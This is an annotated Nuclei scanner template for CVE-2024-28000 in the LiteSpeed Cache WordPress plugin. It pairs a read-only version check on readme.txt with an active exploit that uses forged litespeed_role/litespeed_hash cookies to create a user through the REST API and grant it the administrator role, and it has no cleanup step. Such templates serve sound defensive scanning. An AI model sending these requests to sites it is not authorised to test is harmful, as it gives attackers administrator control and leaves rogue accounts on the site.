# Nuclei template for CVE-2024-28000 (LiteSpeed Cache plugin for WordPress).
# It reports a finding in one of two ways, as set by `flow` below:
#   1. a version fingerprint read from the plugin's readme.txt, or
#   2. an active check that creates a user over the REST API and then
#      assigns it the administrator role.
# Path 2 changes state on the target and needs an operator-supplied
# `litespeed_hash` value; nothing in this template defines that variable.
id: CVE-2024-28000

info:
  name: WordPress LiteSpeed Cache - Unauthenticated Privilege Escalation to Admin
  author: melmathari
  severity: critical
  description: |
    Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.
  impact: |
    Unauthenticated attackers can escalate privileges to administrator level, gaining full control of the WordPress site.
  remediation: |
    Update LiteSpeed Cache plugin to a patched version addressing CVE-2024-28000.
  reference:
    - https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-6-3-0-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
    - https://www.exploit-db.com/exploits/52328
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28000
    - https://vulncheck.com/xdb/6f169f41e032
    - https://blog.securelayer7.net/cve-2024-28000-litespeed-cache-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-28000
    cwe-id: CWE-266,NVD-CWE-Other
    epss-score: 0.92063
    epss-percentile: 0.99719
    cpe: cpe:2.3:a:litespeedtech:litespeed_cache:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    # NOTE(review): three requests are defined under `http`; confirm that 2
    # is the intended value here.
    max-request: 2
    vendor: litespeedtech
    product: litespeed_cache
    framework: wordpress
    publicwww-query: "/wp-content/plugins/litespeed-cache/"
  # `intrusive` marks the state-changing requests (2 and 3) below.
  tags: cve,cve2024,wordpress,wp,wp-plugin,litespeed-cache,priv-esc,intrusive,vkev,vuln

# Request 1 alone is enough for a match. Requests 2 and 3 are only attempted
# when request 1 does not match, and both must then succeed.
flow: http(1) || (http(2) && http(3))

# Randomised values for the account that request 2 tries to create.
variables:
  username: "{{to_lower(rand_text_alpha(5))}}"
  password: "{{rand_text_alphanumeric(12)}}!"
  email: "{{rand_base(8)}}@{{rand_base(5)}}.com"

http:
  # Request 1: read-only version fingerprint. The extractor captures the
  # "Stable tag" value from readme.txt and the matcher compares it with
  # 6.3.0.1, the last affected version named in the description.
  # NOTE(review): a match here is version evidence only. readme.txt may be
  # blocked, stale or edited, so treat the result as a lead to confirm
  # against the installed plugin version.
  - raw:
      - |
        GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'LiteSpeed Cache')
          - compare_versions(version, '<= 6.3.0.1')
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'

  # Request 2: attempts to create a user through the REST API while sending
  # the litespeed_role / litespeed_hash cookies. `litespeed_hash` has to be
  # supplied as an input by whoever runs the template.
  # The matcher and extractor are internal: this step is not reported on its
  # own, it only hands the new account's id to request 3.
  # Log review: a POST to /wp-json/wp/v2/users carrying these two cookies and
  # answered with 201 is the trace this step leaves.
  - raw:
      - |
        POST /wp-json/wp/v2/users HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}

        {
          "username": "{{username}}",
          "password": "{{password}}",
          "email": "{{email}}"
        }

    matchers:
      - type: dsl
        dsl:
          - status_code == 201
          - contains(content_type, "application/json")
          - contains_all(body, "first_name","username")
        condition: and
        internal: true

    extractors:
      - type: json
        name: user_id
        json:
          - ".id"
        internal: true

  # Request 3: sets the role of the account from request 2 to administrator.
  # A match means that account now exists on the target with the
  # administrator role. The template contains no cleanup request, so the
  # account stays in place until it is deleted out of band.
  - raw:
      - |
        PUT /wp-json/wp/v2/users/{{user_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}

        {
          "roles": ["administrator"]
        }

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/json")
          - contains_all(body, "administrator","registered_date")
        condition: and

# NOTE(review): the digest below was issued for the upstream file; re-flowing
# or commenting the template presumably invalidates it, so re-sign or
# re-verify before relying on template signature checks.
# digest: 4b0a00483046022100f9f5692f16a492877eb43b958910071bd4c7fc60d827b74bcf1d55de3b835bab022100d0e7af4e10e7ed9a86d59c0806b7a0a2abdc0d25afb3defb2ab6eedeaaad2faf:922c64590222798bb761d5b6d8e72950